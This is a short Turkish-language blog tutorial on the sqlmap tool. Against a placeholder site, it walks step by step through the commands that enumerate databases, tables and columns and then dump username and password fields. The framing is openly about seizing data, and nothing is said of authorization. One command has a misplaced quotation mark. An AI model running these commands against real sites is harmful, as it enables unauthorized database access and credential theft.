Header Ads

SqlMap Nedir ? Nasıl Kullanılır ?

Merhaba CyberGuilty Okurları;

Uzun bir aradan sonra yeni makale ile karşınızdayım.
Bugün sizlere anlatacağım konu "Sqlmap" yazılımı nedir ve nasıl kullanılır? Bunun üzerine olacak. İlerledikçe size makale yazmakta zorlandığım ve konu bulamadığım şu zamanlarda böyle bir konunun eksik olduğunu farkettim.

Sqlmap, sql ınjection açığı bulunan sayfalarda açıkları sizler için sömürerek sizleri uğraştırmadan verilere ulaştıran bir yazılımdır.
Python ile kodlanmıştır.
Python yüklü olan Mac,Linux ve Windows sistemlerde çalışabilir.
Bu peki nasıl kullanılır ? 
Örnek Sayfa : www.deneme.com/sayfa.php?id=5'
Burada bir güvenlik açığımız var.
Sql Injection'da saldırı senaryosu şöyledir.

Veritabanı>tablo>kolon>veri

Önce veritabanlarını öğrenmem gerekiyor.
sqlmap -u "www.deneme.com/sayfa.php?id=5" --dbs 


Bu yukarıda yazdığım şekilde veritabanına ulaştık. Örneğin "Yönetim" adında bir veritabanı mevcut ve şimdi tabloları öğrenmem gerekiyor.

sqlmap -u "www.deneme.com/sayfa.php?id=5" -D yönetim --tables
Yukarıda yazdığım şekilde tablolara ulaştık. Örneğin "User" diye bir kolon var ve oradaya ulaşmamız gerekiyor.
sqlmap -u "www.deneme.com/sayfa.php?id=5 -D yönetim -T User --columns"

Yukarıda yazdığım şekilde kolonlara ulaştık. "Kullanıcı_Adı ve Pass" adında 2 veri olduğunu düşünüyorum ve bu verileri ele geçireceğim.
Sqlmap -u "www.deneme.com/sayfa.php?id=5" -D yönetim -T user -C kullanıcı_Adı,Pass --dump
Şeklinde olacak ve veriler elimize geçecek basit bir şekilde sql ınjection olayı böyle anlatmış bulunuyorum. Daha karmaşık SQL ataklar için diğer makaleleri takıpte kalınız.
Official Twitter Accounts
CyberGuilty INC. Blogger tarafından desteklenmektedir.